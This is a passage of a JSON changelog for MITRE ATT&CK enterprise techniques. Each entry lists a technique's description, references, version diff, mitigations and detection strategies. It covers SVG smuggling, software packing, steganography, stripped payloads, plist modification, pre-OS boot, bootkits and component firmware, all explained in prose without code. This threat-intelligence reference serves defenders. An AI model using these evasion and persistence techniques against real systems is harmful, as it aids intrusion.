                        "Ye Yint Min Thu Htut, Active Defense Team, DBS Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:20:58.199000+00:00\", \"old_value\": \"2025-04-15 19:59:00.006000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0324: Detection Strategy for Polymorphic Code Mutation and Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--78b9e70d-1605-459c-b23d-e3a25036968c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-25 15:31:09.697000+00:00",
                    "modified": "2026-04-15 22:22:02.298000+00:00",
                    "name": "SVG Smuggling",
                    "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files. \n\nSVG smuggling can take a number of forms. For example, threat actors may include content that: \n\n* Assembles malicious payloads(Citation: Talos SVG Smuggling 2022)\n* Downloads malicious payloads(Citation: Cofense SVG Smuggling 2024)\n* Redirects users to malicious websites(Citation: Bleeping Computer SVG Smuggling 2024)\n* Displays interactive content to users, such as fake login forms and download buttons.(Citation: Bleeping Computer SVG Smuggling 2024)\n\nSVG Smuggling may be used in conjunction with [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) where an SVG with a malicious payload is included inside an HTML file.(Citation: Talos SVG Smuggling 2022) SVGs may also be included in other types of documents, such as PDFs.  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/017",
                            "external_id": "T1027.017"
                        },
                        {
                            "source_name": "Talos SVG Smuggling 2022",
                            "description": "Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. Retrieved March 25, 2025.",
                            "url": "https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/"
                        },
                        {
                            "source_name": "Trustwave SVG Smuggling 2025",
                            "description": "Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.",
                            "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pixel-perfect-trap-the-surge-of-svg-borne-phishing-attacks/"
                        },
                        {
                            "source_name": "Bleeping Computer SVG Smuggling 2024",
                            "description": "Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025.",
                            "url": "https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/"
                        },
                        {
                            "source_name": "Cofense SVG Smuggling 2024",
                            "description": "Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025.",
                            "url": "https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dhiraj Mishra (@RandomDhiraj)",
                        "Suraj Khetani (@r00treaver)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:22:02.298000+00:00\", \"old_value\": \"2025-04-15 19:58:43.263000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1048: Application Isolation and Sandboxing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0510: Detection Strategy for SVG Smuggling with Script Execution and Delivery Behavior"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 14:17:46.686000+00:00",
                    "modified": "2026-04-15 22:15:31.610000+00:00",
                    "name": "Software Packing",
                    "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/002",
                            "external_id": "T1027.002"
                        },
                        {
                            "source_name": "Awesome Executable Packing",
                            "description": "Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.",
                            "url": "https://github.com/dhondta/awesome-executable-packing"
                        },
                        {
                            "source_name": "ESET FinFisher Jan 2018",
                            "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Filip Kafka, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:15:31.610000+00:00\", \"old_value\": \"2025-10-24 17:49:29.503000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0023: Obfuscated Binary Unpacking Detection via Behavioral Patterns"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 14:28:16.719000+00:00",
                    "modified": "2026-04-15 22:21:09.201000+00:00",
                    "name": "Steganography",
                    "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202f<code>Invoke-PSImage</code>\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/003",
                            "external_id": "T1027.003"
                        },
                        {
                            "source_name": "McAfee Malicious Doc Targets Pyeongchang Olympics",
                            "description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.",
                            "url": "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
                        },
                        {
                            "source_name": "Wikipedia Duqu",
                            "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.",
                            "url": "https://en.wikipedia.org/wiki/Duqu"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:21:09.201000+00:00\", \"old_value\": \"2025-10-24 17:49:20.395000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0119: Detection Strategy for Steganographic Abuse in File & Script Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-29 18:30:12.244000+00:00",
                    "modified": "2026-04-15 22:21:58.918000+00:00",
                    "name": "Stripped Payloads",
                    "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system\u2019s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/008",
                            "external_id": "T1027.008"
                        },
                        {
                            "source_name": "intezer stripped binaries elf files 2018",
                            "description": "Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.",
                            "url": "https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/"
                        },
                        {
                            "source_name": "SentinelLabs reversing run-only applescripts 2021",
                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.",
                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
                        },
                        {
                            "source_name": "Mandiant golang stripped binaries explanation",
                            "description": "STEPHEN ECKELS. (2022, February 28). Ready, Set, Go \u2014 Golang Internals and Symbol Recovery. Retrieved September 29, 2022.",
                            "url": "https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:21:58.918000+00:00\", \"old_value\": \"2025-04-15 19:58:18.337000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0019: Detection Strategy for Stripped Payloads Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-04-09 15:06:32.458000+00:00",
                    "modified": "2026-04-16 20:07:52.947000+00:00",
                    "name": "Plist File Modification",
                    "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application\u2019s <code>info.plist</code> file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1647",
                            "external_id": "T1647"
                        },
                        {
                            "source_name": "eset_osx_flashback",
                            "description": "ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf"
                        },
                        {
                            "source_name": "fileinfo plist file description",
                            "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.",
                            "url": "https://fileinfo.com/extension/plist"
                        },
                        {
                            "source_name": "wardle chp2 persistence",
                            "description": "Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.",
                            "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.947000+00:00\", \"old_value\": \"2025-10-24 17:49:00.573000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0109: Detection Strategy for Plist File Modification (T1647)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-11-13 14:44:49.439000+00:00",
                    "modified": "2026-04-17 18:38:50.048000+00:00",
                    "name": "Pre-OS Boot",
                    "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542",
                            "external_id": "T1542"
                        },
                        {
                            "source_name": "Wikipedia Booting",
                            "description": "Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.",
                            "url": "https://en.wikipedia.org/wiki/Booting"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:50.048000+00:00\", \"old_value\": \"2025-10-24 17:49:01.466000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"ITWorld Hard Disk Health Dec 2014\", \"description\": \"Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024.\", \"url\": \"https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1035: Limit Access to Resource Over Network",
                            "M1046: Boot Integrity",
                            "M1047: Audit",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0278: Detection Strategy for T1542 Pre-OS Boot"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-12-19 21:05:38.123000+00:00",
                    "modified": "2026-04-17 18:38:49.558000+00:00",
                    "name": "Bootkit",
                    "description": "Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nIn BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.\n\nIn UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542/003",
                            "external_id": "T1542.003"
                        },
                        {
                            "source_name": "Lau 2011",
                            "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.",
                            "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion"
                        },
                        {
                            "source_name": "Mandiant M Trends 2016",
                            "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
                        },
                        {
                            "source_name": "welivesecurity",
                            "description": "Martin Smol\u00e1r. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.",
                            "url": "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/"
                        },
                        {
                            "source_name": "Microsoft Security",
                            "description": "Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 18:38:49.558000+00:00\", \"old_value\": \"2025-10-24 17:48:28.341000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1046: Boot Integrity"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0150: Detection Strategy for File Creation or Modification of Boot Files"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-12-19 20:21:21.669000+00:00",
                    "modified": "2026-04-17 18:38:49.538000+00:00",
                    "name": "Component Firmware",
                    "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1542/002",
                            "external_id": "T1542.002"
                        }
                    ],
                    "object_marking_refs": [
